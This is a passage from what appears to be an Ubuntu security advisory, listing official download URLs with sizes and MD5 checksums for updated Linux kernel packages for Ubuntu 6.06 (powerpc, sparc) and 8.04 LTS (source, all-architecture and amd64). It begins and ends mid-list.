http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 80718 23b95e81f03bc2f1945a68c95b5ca0c0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 86102 93538ed0e204bc73cd43c85fa35e1267 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 111582 f45b133044c56acda12644ba4078c8d8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 125746 64f893a4617d23ba71a4978073c69ea9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 53420 f3068829108e0f427319f8fc8d3583c5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 58488 355b067b6df8831ac4f1dc2fecc14eab http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 147958 cd32046627d7f13e714c221c53d40c55 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 161904 f93d8ca7512a551bd7398fc7cee6fd64 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 318408 fa7d8c1e7d8bd76df307905f0196a400 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 288040 4ebf0c29edf9524f522a04fb7de2bbed http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 115862 162e57d7c05efb230a5ee28166274d48 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 116548 e9043614b899415f0c8a76d36be2ddcf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1924852 d631cca9cd285ba34edd939dd3d218ad http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 2449056 1ea03fdc33ee2189028f9b52e23355d6 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.81_powerpc.deb Size/MD5: 873942 a877a8f14eae6baef77586c797810f4c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.81_powerpc.deb Size/MD5: 870274 c1e1e32e9582b473c23386f77147ecc8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.81_powerpc.deb Size/MD5: 870700 fe1f4802c5d8a2cb91066db213f175c3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.81_powerpc.deb Size/MD5: 6947602 9a849f1bc9c09edb3499aea9433eed86 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.81_powerpc.deb Size/MD5: 22782758 3e79981331154857556649efb26abaf9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.81_powerpc.deb Size/MD5: 23693170 e91dee7348629406068dec10c6c2b2dd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.81_powerpc.deb Size/MD5: 22364868 34370def04122ec031be4173bed62727 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 17780 cf22ebf3da94d90923009ea9355d838e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 17388 2be01425709635adf8103d809a8b622f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 261364 6121691810560a112a83107438a56fb0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 282628 649559c29df4100977a9818936dfdc74 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 227814 bbc0627b3ced8d959517dd0d81ee0e5b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 248952 7165e9616d58b920e823c10bb26325d7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1048468 986cc04488c2779efc2eae1ab0927187 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1048608 27eb1a877ebc7de98ba02410427e0e3e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1738540 974ab8b88abcb15adadfe8a5d4e83839 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1878130 cfb730a0fdcdd1a54454ef7e5bdc8a54 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 250832 ad79f5bf42736201c75f750981c92be5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 233534 3ea350952cd7a38b4aed04d7a38255b7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 13056 4f3739b620b6d77e42a75c2f71e6bef4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 13530 1814123cc4fc16643755bf1a3255263c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 84798 d84ce928505166885acca4eff117e608 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 52208 01cec0da15748ddda667b9bf4c9c2069 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 73928 f80b31ee8edb4c1dc5e28a6559f5e0da http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 85854 1bfd17aa829523974da2876d28c93125 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 6620 a76df30ec69406cf733027f4a9f253f3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 7056 507ac9695af0962f21c9d91bad7bf742 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 60380 ed89b7264955ce54cf4f6cf5fdf0be58 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 70424 8df1f966c2eebe02a4039cb3fa957528 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 128550 7702ec6233b23341846d0f8bffb3f4b5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 157946 971f6c7635269ffeb75b9b0c63df0978 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 108156 57a946d5f2c18f668424925f60add6d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 126126 af5b8d870e0231aa9b3b1a511553ec1c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 87292 c8dedae2fdf99833b58f305a08dc2c8a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 93364 107e6724b8c5cbe7dafdbb5dbcf50593 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 2014714 06d3ad3441673a24dc500251f9d251a5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 1988682 d2accecc1fde3d56e2707abbe6bac535 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 104122 42ffcfd11617dc1005c1cb871c13aa4a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 115794 5e8e5c978560d2937f6bd7eb4090284a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 12742 e9973d1bd1b59d7acc18c1992d01d430 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 14444 9bd2ca6c950e62780985171467794638 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 39948 fdeded797558637b2c1f6ae2a0b7c501 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 41542 845c1be053a8f13412dfafcfb9c04648 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 149350 25d3b6ddd1ed8bb036d9cfc31dcdf2bd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 168076 2277f7ae60c6d6762cb4427900b93b3a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 42310 a4ed5569c066899045d37a51488e1293 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 44916 9700e93f01fd05f9ecd63f87b025c131 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.81_powerpc.udeb Size/MD5: 320332 ef48c34eb2c9f2eb22983b43174f3f1b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.81_powerpc.udeb Size/MD5: 324866 3e2ed8f88f2da0dec50a64fc3ab44c84 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 50476 01211803a0b50f2e41ac12d1e860a692 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 2360 5aeaf097f5626a2279b90e6c34f385fb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 40376 4dea984c062ddca28c1c988d44379d93 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 110558 efcd4322669e1c652be432a1873c58b5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 41216 1333577e7eb7214eeb78c0f2225b25f5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 104216 5a7727e8e1b2ed6d5530ce2a009aa3c7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 7434 f4a49bda2f12cab77972543789a756ff http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 149304 d620efc0eb4e1b3cf53672ac721ece98 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 1712718 919c1fda81a3f802a5851963144cd442 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.81_sparc.deb Size/MD5: 773038 5c6764ec8ab3a682f2e2113da00fb012 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.81_sparc.deb Size/MD5: 772518 6702f6f4a455db59b935b6f8490c3ff7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.81_sparc.deb Size/MD5: 6963708 47de01105b88b1d370ffa2713e2923fc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.81_sparc.deb Size/MD5: 15017102 f5575856ff8f5a2b3193a6f0fdb4e8f0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.81_sparc.deb Size/MD5: 14832428 431004b76eb2a38fe8cf4c83cf470c18 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 7434 7fd40198fd66f470310aed40f74dc2a8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 248766 2aabbc8e0eff811a4b62cc13d9a8f163 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 212558 59751d34820c94bfb847857141cf5903 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 1048464 b6b4335a21ea983d3ad8fa78a2870ac1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 1482360 306850ff03346753f1ae5c7227aaa8fd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 10114 4b077d19a5b32e76e80a750ecdfaa633 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 40178 2d4bbcb9f55c752e91136b518d83f009 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 9364 17455b9b47e1255f2c9623a1fe31a7c3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 61396 da1882f3af550ace8ffd8885dc3e2367 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 163276 96cb16fde7216ec7f752f98cbd886de1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 64094 f3ace7fba9caef24383525d365cfa06b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 1235386 660eea19c06e89f967812d9da5160b5f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 59320 680d9c7e3c7c937412b0a56ec32a7e76 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 37426 0a0a0f305b377dc1b08eb4355563f889 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.81_sparc.udeb Size/MD5: 280134 ca2c5547427790471cbd1ba548f25ce9 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-26.64.diff.gz Size/MD5: 4796705 d083c260d9af052d8b1ac628b09a4d85 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-26.64.dsc Size/MD5: 2257 884e9ea8ff0746ccb610f6cd7bac66fa http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-26.64_all.deb Size/MD5: 4930694 7cc0852a8df5d1235c47ecd4687d6d06 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26_2.6.24-26.64_all.deb Size/MD5: 8145454 3fb62e0df3d7d6f93aa803c39bdd2994 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-26.64_all.deb Size/MD5: 98898 2ae7be85a5893479016a2eeed65c2371 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-26.64_all.deb Size/MD5: 46988628 7272bedffdeef5aef7110cf66b826821 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 28618 b3f7df2c441ec0734a0d50deefd86fc4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 224204 382d6c17adc672920e61d11c9c23168f http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 52644 1bece0d119d788da8f1acaccbea6c9b8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 40650 d543c0f8cbc255510040a52ff57d41da http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 48650 7105a73162e8764232da454b25b598dd http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 86336 d39b51f5af88b56ad487230e793dca3f http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 36314 24bfdaf7b6ea42ee4272b95c263d6f76 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 648754 0a45c26cdd627b5d14f5e2dd5491caeb http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 209916 56bbcf198fe9dd0c264964ab83da416f http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 39194 a388d1e7e78a3c254165cbf97dd41bf3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 68002 46f14c124d06a9a3d38f64d0d5bafeee http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 145460 4133255a5e561d3bec79cf40d9a6b14c http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 287272 90427d886b7d13262cb6b5fc7c02d1a7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 2130610 13d4eaee7c4e596c5fae2f2716d500a2 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-generic_2.6.24-26.64_amd64.deb Size/MD5: 673476 b90779973ad9b4cbdeaeeb77a4541ddd http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-openvz_2.6.24-26.64_amd64.deb Size/MD5: 1252666 e179156a20fac570d14fefdb64ee80ec http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-rt_2.6.24-26.64_amd64.deb Size/MD5: 1274856 8e1be29f5c030346c208eb4c701c4503 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-server_2.6.24-26.64_amd64.deb Size/MD5: 674282 0ead5e8e7be5353419258071411f9649 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-xen_2.6.24-26.64_amd64.deb Size/MD5: 1084264 0af115ceb4b7b576502b770d22da9f4b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-26-generic_2.6.24-26.64_amd64.deb Size/MD5: 17810596 df93588f4f8b07629f5f0a5b30870d0a http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-26-server_2.6.24-26.64_amd64.deb Size/MD5: 17777002 f30d240161551074d98689613c8f6aaf http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-26-generic_2.6.24-26.64_amd64.deb Size/MD5: 21043588 a131a86da021133a7313a438b107ae92 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-26-server_2.6.24-26.64_amd64.deb Size/MD5: 21421898 2d2bed96120e7c96f988760ca24e2dd8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-26.64_amd64.deb Size/MD5: 707264 f514f906947ae651399929fe83636dbd http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 263674 05b189c58a58383f6872b22911d46063 http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 176420 b67a941984fecda8845151815310b658 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 254118 1366e40a9ad455b3818508377f4af3ee http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 1641208 0c0c74351cc342724732d25a8929acb5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 143720 a9966e20ea8d4191a1c56ebad861fe44 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 164478 609423b0169041fb9f0d5c8674ff0efc http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 115874 fa20ee7707d5ec8e5e89cb365189b063 http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 35056 61ad2622f9cbd6398e17f58cf16d2d3e http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 64410 835e4e40501acdc3f4f1d6aa7416a647 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 69710 53869d39e81ec01bcfe7adbdd674d65d http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 21596 10d4283663da10cec8d9b9684c18ec19 http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 8622 2a55559a9d62f21c71ac6d2c10dc8f50 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 57230 e903e3ea3a1be8cc7ba5c83b38f85f2f http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 103042 c42a2de3e8393968dc813f50bd28b77d http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 1212592 2bbc0aa9e0bc0497ea6a40b7312e32b6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 45502 a0b0654845343d003f87f9c2edb793d1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 12772 84fe8a9ea2518fffc6c65c5ca2091c71 http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 498066 7a55d99e9326c3dc41fe4dabffa81c15 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-26-generic-di_2.6.24-26.64_amd64.udeb Size/MD5: 75058 ad5e04975f8320bd3f4cf8afa3651284 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-26-openvz_2.6.24-26.64_amd64.deb Size/MD5: 